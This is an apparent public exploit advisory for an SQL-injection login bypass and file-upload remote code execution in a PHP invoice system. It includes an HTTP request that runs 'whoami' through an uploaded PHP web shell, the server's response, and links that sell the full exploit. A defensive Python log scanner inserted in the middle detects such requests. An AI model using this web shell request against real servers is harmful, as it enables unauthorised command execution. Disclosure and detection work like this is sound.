# Titles: INVOICE-1.0-Copyright©2025-SQLi-Bypass-Authentication+FU+RCE
# Author: nu11secur1ty
# Date: 04/07/2025
# Vendor: https://github.com/oretnom23
# Software: https://www.sourcecodester.com/php/14858/invoice-system-using-phpoop-free-source-code.html
# Reference: https://portswigger.net/web-security/sql-injection > https://portswigger.net/daily-swig/rce

### Description:
The `username` parameter appears to be vulnerable to SQL injection that bypasses authentication.
An attacker can use this vulnerability to log in to the system and then upload a malicious PHP file.
After the upload, the attacker can execute that file to obtain sensitive information and even manage the system from the inside,
depending on the scenario.

STATUS: HIGH-CRITICAL Vulnerability


[+]Exploit:

```RCE
GET /pwnedhost/simple_invoice/uploads/1744008900_RCE.php?cmd=whoami HTTP/1.1
Host: 192.168.100.45
Cookie: PHPSESSID=divmu5157smqqnv6j7efs8br5p
Cache-Control: max-age=0
Sec-Ch-Ua: "Not:A-Brand";v="24", "Chromium";v="134"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
```
[+]Response:

```RCE-response:
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 07:48:39 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

desktop-ahflgug\nu11secur1ty
```
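
A defender-side check for the request and response shown above, added here as an example and not part of the original advisory: it scans web server access logs for requests that reached a script inside an upload directory and reports whether the server answered with a 2xx status. The Apache combined log format, the function name `find_upload_script_hits`, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "common"/"combined" log prefix (assumed format; adapt to a custom LogFormat).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Extensions commonly mapped to the PHP handler; "(/|$)" also catches PATH_INFO requests.
SCRIPT_RE = re.compile(r'\.(php\d?|phtml|phar)(/|$)', re.IGNORECASE)
UPLOAD_DIR = "/uploads/"  # path segment taken from the request in the advisory

def find_upload_script_hits(lines):
    """Return one finding per request that reached a script under an upload directory."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        url = urlsplit(m["target"])
        path = unquote(url.path)  # decode %2E etc. before matching
        if UPLOAD_DIR not in path.lower() or not SCRIPT_RE.search(path):
            continue
        status = int(m["status"])
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "path": path,
            # Parameter names only; values are left out of the finding.
            "params": sorted(parse_qs(url.query, keep_blank_values=True)),
            # 2xx: the server served or ran the file; 403/404: blocked or absent.
            "executed": 200 <= status < 300,
        })
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Apr/2025:07:48:10 +0000] "GET /simple_invoice/uploads/logo.png HTTP/1.1" 200 1830 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [07/Apr/2025:07:48:39 +0000] "GET /pwnedhost/simple_invoice/uploads/1744008900_RCE.php?cmd=whoami HTTP/1.1" 200 29 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Apr/2025:08:02:11 +0000] "GET /simple_invoice/uploads/x%2Ephtml/info HTTP/1.1" 403 199 "-" "-"',
    'not a log line',
]

if __name__ == "__main__":
    for hit in find_upload_script_hits(SAMPLE_LOG):
        print(hit)
```

A finding with `executed` set to true means the web server ran a script from a directory that users can write to; upload directories should be served with script handlers disabled.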

# Reproduce:
[href](https://www.patreon.com/posts/invoice-1-c-2025-126106368)

# Buy the full exploit: 
[href](https://satoshidisk.com/pay/CO7bRi)

# Time spent:
01:15:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
                          nu11secur1ty <http://nu11secur1ty.com/>